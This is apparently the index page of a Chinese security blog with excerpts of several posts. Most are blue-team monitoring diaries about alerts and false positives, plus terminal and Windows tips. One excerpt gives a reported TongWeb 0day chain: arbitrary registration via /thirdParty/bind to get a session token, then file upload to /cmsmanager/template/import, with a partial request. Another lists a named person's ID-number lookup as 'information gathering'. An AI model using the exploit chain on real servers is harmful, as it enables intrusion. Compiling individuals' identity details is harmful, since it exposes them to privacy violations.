lan1ocのBLOG

昨晚爆0day了今早同事发了个存疑的包，只能参考，zip包还不知道是否要特殊构造 据小道消息tongweb有这么个洞 /thirdParty/bind 任意用户注册，包发过去，会返回accesstoken（JSESSIONID），拿token打上传 {"username":"userxxxx","loginway": 1, "loginType": "xxx", "thirdId": "abcdefg”} 上传接口 /cmsmanager/template/import 12345678910111213141516171819202122232425262728POST /cmsmanager/template/import?isCover=1 HTTP/1.1Host: Connection: keep-aliveContent-Length: 203Cache-Control: max-age=0sec-ch-ua:...

发现一个攻击ip了告警一直在进行扫描微步查了近期攻击行为也较多唉通知客户了，可是还没封，我这就管个态势，我封他也没用啊。。。。 无结果啥都没发现啊其他的一点连不上 同事讨论原来不止我一人这样啊，我是第四天才看到扫描类的告警，有的同事基本都没看到过求干奥，真的求干奥，能不能卖力点 ps：有攻击队被同事溯源了，真的难绷 排名倒一不对劲啊，我这今天才看到明确攻击行为的告警，怎么我们市倒一，额。。。。应该不是我的责任吧。。。。。真没啥告警啊 不敢求干了，怎么倒一了，真的啥也没看到啊，可疑的也摇人分析了，唉 之前遇到的奇怪的错误堆栈信息的包终于看到一个比较完整的了 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576--fe7bae61-bea2-4b14-84e7-e73981c5fd4c Content-Disposition: form-data;...

又都是误报，相关群里说了开放政务网攻击，但是总结的攻击ip还是一条都没发现嗯，依旧风平浪静 奇怪的误报包跟同事讨论后觉得应该是正常业务包，告警类型是但是传了个二进制数据，匹配到了or关键字但是服务端什么回显都没有请求的路径是不是很看得懂，ai分析是说推测为Trend Micro OfficeScan的文件上传接口搞不懂，应该不是攻击，反正也通报客户注意了

风平浪静SIP的告警显示好怪啊，设置自动刷新了，有时候没刷新，然后有时候我刷新了没反应，后面刷出来了，发现是几分钟前了，但那个时候我都刷过了。。。。。。 奇怪的包昨天就注意到了，一个可能是上传文件的包？毕竟服务端回显上传文件成功，也给了路径但我看请求体全是错误堆栈信息，好像还是手机传的，告警显示如下我觉得应该是误报，匹配到了这个关键字标红的信息除了有个资产ip，其他也没啥都是错误堆栈信息，问了同事，讨论后决定应该是误报，再观察吧

用的是深信服的态势感知SIP误报误报很多，明确的攻击行为没怎么检测到不要自己吓自己，多查 疑似攻击事件态感的告警类型的是通用系统代码注入源ip和代理ip查了下微步全红，然后看日志，没怎么分析出，感觉就像是一个员工通过vpn远程访问内网的操作，但是最后的数据包，服务端回显了一个jwt认证值，解不出来，没有密钥，和同事讨论了下，说可能是攻击主要是客户那边一直不回啊，不知道是正常业务还是啥，不敢直接封禁 终于是回复了，最后是讨论了之后，由他那边让防火墙直接封禁这个ip

信息收集身份证号1严光玉 1https://www.cdp.edu.cn/__local/4/77/12/5252F533CA4EBAF8AB658046F1B_B3946082_17F35.pdf

赶上好时候了用国内edu邮箱嫖来的

中午吃饭水群看到消息了蛮操作下真嫖到了，代理用美国节点就行还有2T的google one

warp一款牛逼的带ai的终端，但目前感觉也不算太牛逼，可能没找对用法，毕竟tabby用习惯了 ssh免密并自动warpifyssh免密这个不用说了，直接启动ai帮你搞就行了，free版每天有150次对话机会自动warpify就在第一次ssh连接时，运行 12echo -e '\n# Auto-Warpify for Warp\nif [[ "$-" == *i* ]]; then\n printf '\''\eP$f{"hook":"SourcedRcFileForWarp","value":{"shell":"bash","uname":"'"$(uname)"'"}}\x9c'\''\nfi\n' >> ~/.bashrc 1source...

问题情景每次打开新应用或者切应用要输入时，输入法就卡住，半天才能显示出来 分析临时文件过多 解决：清理 TMP 临时文件1cd "$env:AppData\Microsoft\InputMethod\Chs" 临时文件一眼望不到头啊，直接删 1Remove-Item -Path '*.tmp' -Force 关删除都删了一分半多，并且随时就能产生一堆临时文件啊还是要定期清理啊，写个计划任务吧先写个清理脚本1.ps1 12# Delete all .tmp files under IME cache pathRemove-Item -Path "$env:AppData\Microsoft\InputMethod\Chs\*.tmp" -Recurse -Force -ErrorAction SilentlyContinue win+r->taskschd.msc就启动的时候清理一次算了然后填刚刚写的那个脚本 1-ExecutionPolicy Bypass -WindowStyle Hidden -File...